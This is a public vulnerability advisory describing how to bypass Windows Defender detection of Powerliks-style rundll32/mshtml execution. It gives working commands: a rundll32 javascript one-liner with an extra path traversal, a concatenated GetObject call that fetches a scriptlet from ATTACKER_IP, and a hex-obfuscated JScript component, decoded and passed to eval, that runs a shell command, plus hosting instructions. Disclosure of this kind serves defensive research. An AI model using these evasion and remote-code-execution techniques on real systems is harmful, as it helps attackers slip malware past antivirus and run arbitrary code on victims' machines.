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[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER DETECTION BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for
Endpoint. This protection brings together
machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure
to protect devices (or endpoints) in
your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for
Endpoint to provide protection on your
device and in the cloud.
[Vulnerability Type]
Windows Defender Detection Bypass
TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A
[CVE Reference]
N/A
[Security Issue]
Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that
leverages rundll32.exe. Attempts at execution fail
and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra
path traversal when referencing mshtml.
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.
Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
Windows Defender also detects based on the following javascript call using
GetObject("script:http://ATTACKER_IP/hi.tmp").
However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the
payload.
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.
Full bypass E.g.
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
Enter, Backdoor:JS/Relvelshe.A detection.
```

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Windows Defender also prevents downloaded code execution, detected as "Backdoor: JS/Relvelshe.A" and is removed by
Windows Defender once it hits InetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"
However, this is easily bypassed by Hex encoding our payload code new
ActiveXObject("WScript.Shell").Run("calc.exe").
Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to
Jscripts builtin eval function.
[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?
Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
Backdoor: JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?
Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
Advisory:
https://twitter.com/hyp3rlinx/status/1480651583172091904
[Exploit/PoC]
1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and
defeats Backdoor: JS/Relvelshe.A detection.
python -m http.server 80
"hi.tmp"
<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
</script>
</component>
2) C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication
";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
BOOM!
[Network Access]
Local
[Severity]
High
```

[Disclosure Timeline]

January 10, 2022 : Public Disclosure

## [+] Disclaimer

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